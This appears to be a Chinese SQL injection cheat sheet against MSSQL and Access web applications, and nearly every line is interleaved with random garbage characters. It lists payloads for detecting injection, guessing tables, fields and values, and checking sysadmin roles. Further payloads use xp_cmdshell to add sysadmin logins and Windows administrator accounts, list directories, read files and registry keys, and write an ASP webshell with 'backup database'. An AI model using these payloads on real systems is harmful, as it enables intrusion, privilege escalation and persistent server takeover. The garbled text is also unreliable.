1.判断是否有注入;and 1=1 ;and 1=2 7x%S��](m%
2.初步判断是否是mssql ;and user>0 �{��dZ!��I
��89d�b5Dx
3.注入参数是字符'and [查询条件] and ''=' �LH,]vuXh�
98�h :X��%
4.搜索时没过滤参数的'and [查询条件] and '%25'=' VZt;P%�1;h
cB�_pyX9�Z
5.判断数据库系统 r)c+�".0d^
x<�Iy�<v7-
;and (select count(*) from sysobjects)>0 mssql �uvR0TI�F4
gj[z�ka0_�
;and (select count(*) from msysobjects)>0 access F:M/�z#�:~
n$IWoIdbGN
�-�*r��[�
H��E@�-uh�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �prqy�oCfq
�>eEnQ}Y��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 F�9F" �F��
�)CFk�`57U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �+jv�}\Jt
G2�=F8��kL
9.(1)猜字段的ascii值(access) �PI�g�GXNo
3,%nk�W���
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 U
�7E��HBW
�Bl=�n�j.g
(2)猜字段的ascii值(mssql) �f �5mY;z"
-e &$,R>;
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <=$rU2�32}
SgyqmYTvZw
10.测试权限结构(mssql) �V�t�D@&�N
D7�EX�qo�
K�<�R�maXZ
�0BT;�"B�1
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- N�z3z��sP$
�s�Wp��{Y.
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- M\9���at\$
l#t��S.+B7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �?�OdV1x�B
UB�5�}i('L
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ���CM`�x>J
RA#\���x.�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �K�3�a>^g
�L�-`(!j��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �*Ro8W-+��
qw9e)
`3$�
;and 1=(select IS_MEMBER('db_owner'));-- ��(� �P��
v!n�m
�&"�
6{cybD`Ef&
Bju�r�m��o
11.添加mssql和系统的帐户 jQY�>9+t��
-[��G/�2F'
;exec master.dbo.sp_addlogin username;-- <u�r KI�u�
;exec master.dbo.sp_password null,username,password;-- �T_�3V/)%@
}�P���05eI
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5wT'�,U"+�
.@4Q�k�G/
;exec master.dbo.xp_cmdshell 'net user username password *U( 1iv0�n
9�"�m�,�p�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- qJ#�L)���
|3�s.;w��K
;exec master.dbo.xp_cmdshell 'net user username password /add';--
*K]��>�}�
�jK&�
N�kp
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- iS�nI�Bs9\
7~n�I�a��T
['/;'NhdlY
'hxs((['\�
12.(1)遍历目录 $��ijx#a&O
l*~�"5f�03
;create table dirs(paths varchar(100), id int) ~+sne7
6 U
_Cu[s�?,kS
;insert dirs exec master.dbo.xp_dirtree 'c:\' OI)�&vQ�5k
3N�(8|��wh
;and (select top 1 paths from dirs)>0 0SAG6k~x��
!O 0ZD4/{4
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 34"{r�MbQ�
`=�_��7I?�
0L3�Bo3:�k
6^7)GCq� [
(2)遍历目录 {Bav$kw;?e
m~Lf�^gbG?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- J`U�$b�+q6
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 =g{�_�^^�n
�4�v rm&�k
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 #R~�">g:w
S/#) :,Y�S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 MAsWds`bpB
dbf��^A1HI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 k��+W�����
�u!=�]zW%
>=.ch5h3J)
@ef//G+Z"�
13.mssql中的存储过程 {�jj�]K�.&
�;`�X`c��
xp_regenumvalues 注册表根键, 子键 �Y?"v�2~;3
fY|�@{]r�x
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��KUl
Zk^a
, V0i�M��q
xp_regread 根键,子键,键值名 $io�aunQKP
�BD�v|~NHs
;exec xp_regread eZa3K��3�^
VZ9�e~){xA
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �(E2�lv�#[
�ZwY��`x')
xp_regwrite 根键,子键, 值名, 值类型, 值 m�?
\#vw$�
�`<�]�P"G�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Dz�X6U�[=�
2��dp*>F0L
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2�0S�F<�V�
�D�@/9+]-,
xp_regdeletevalue 根键,子键,值名 R�47I�\��{
L��H?g�J8`
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 mvW^P��`nB
C9�"f6>i��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �+o�xqS&$L
F�vtM~��[Q
z9��OMC$,V
K�-�g=td/@
14.mssql的backup创建webshell =CD:.FG.�
��A�;/X�t�
use model ��;iwD/=�Y
K284R=j -&
create table cmd(str image); �}RC.�Q`�b
m�\R@.jkZ�
insert into cmd(str) values (''); ;&7qw�69�k
;�n:��H6cp
backup database model to disk='c:\l.asp'; |�r<.�R�>�
il�`C,�C�D
+E""8kW- Z
��Z(L�s#hp
15.mssql内置函数 �r`mzs�O-'
�+ik N)� D
;and (select @@version)>0 获得Windows的版本号 ]8�q%�bsl+
]ci��|$@�V
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �\k$]G��K-
.PA�?N�{z
;and (select user_name())>0 爆当前系统的连接用户 !'�6J;F�b#
t&�p:vX�F2
;and (select db_name())>0 得到当前连接的数据库 l�1`�c�?Y�
JY;#]'T\�;
X~<>�K/}u5
�u:{�.
Hn`
16.简洁的webshell �
��t`&�s�
unbcz{&Hb[
use model Ay[9k�=q�]
HeA�c(_=C�
create table cmd(str image); `siy�!�R��
"~�i#9L/�H
insert into cmd(str) values (''); :�#�"�OCXr
l�#J>I��t\
backup database model to disk='g:\wwwtest\l.asp';
